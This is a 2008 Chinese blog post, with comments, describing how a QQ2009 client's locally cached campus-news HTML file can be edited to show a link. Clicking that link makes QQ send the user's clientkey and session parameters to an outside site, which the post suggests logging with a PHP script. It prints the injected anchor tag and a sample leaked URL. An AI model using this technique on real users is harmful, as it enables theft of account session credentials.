QQ2009校友动态小BUG
如果一个QQ群,开通了QQ校友的话,那么在QQ群聊天面板会出现这样的情况:
同时会在 Tencent\QQ2009\Users\QQ号\IE\CampusInfo 目录下面生成一个html,文件名不固定,我也没研究透,那么编辑该文件,就是在动态一栏显示的内容,在这个文件中,我们可以进行编辑,随时就可以在QQ群右侧更新出来。。
比如,我写入:
<center><a href=http://www.woyigui.cn/xiaonei.php?test=qq>Fuck xiaonei</a></center>
那么就会立即显示出来,其实也不算BUG,只不过在右侧显示时,我们只要点击 fuck xiaoyou 这个链接。那么他就会打开此链接,并加上一些参数,比如:
http://www.woyigui.cn/xiaoyou.php?test=qq&clientuin=283*88088&clientkey=****D7EC5564347AAFFD4E78792BC61FEA2F4A7D190BCF4086C61E1363C0D9&ADUIN=283*88088&ADSESSION=12**752&ADTAG=CLIENT.QQ.2137_
一些信息我加上星号,这样,我们只要在xiaonei.php文件中,接收这些数据,并保存下来,就有好戏了。只不过在利用时不太好利用,可以在QQ目录下用 echo 命令追加一些信息到 html中,但是如果有这个写权限,我们就没有必要做这种事了。。所以这东西只能玩玩。。
转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:QQ2009校友动态小BUG
本文地址:http://www.woyigui.cn/2008/12/18/QQ2009-xiaonei-bug/
不错不错。 够隐藏了。 用处很大的说
[回复]
woyigui 回复:
十二月 19th, 2008 at 上午 1:06
得和其他的一起利用才行。。
[回复]
早发现鸟,不是2009有这个bug,都可以这样改。
意义不大,测试了一下,只有改本地有效果,如果提交到服务器,过滤的很厉害,没发现什么简单利用方法。
[回复]
不过,以前的版本是在%user%目录的temp目录下。
而且,只能本地看到,别人是看不到的,没得利用。
[回复]
woyigui 回复:
十二月 19th, 2008 at 上午 1:07
不是上传到服务器上,而是修改本地文件,等他自己去点击。如果可以上传到服务器的话,那影响的都是全群的人了。。
[回复]
不错,很不错,学习就应该这样,我要向你学习。
[回复]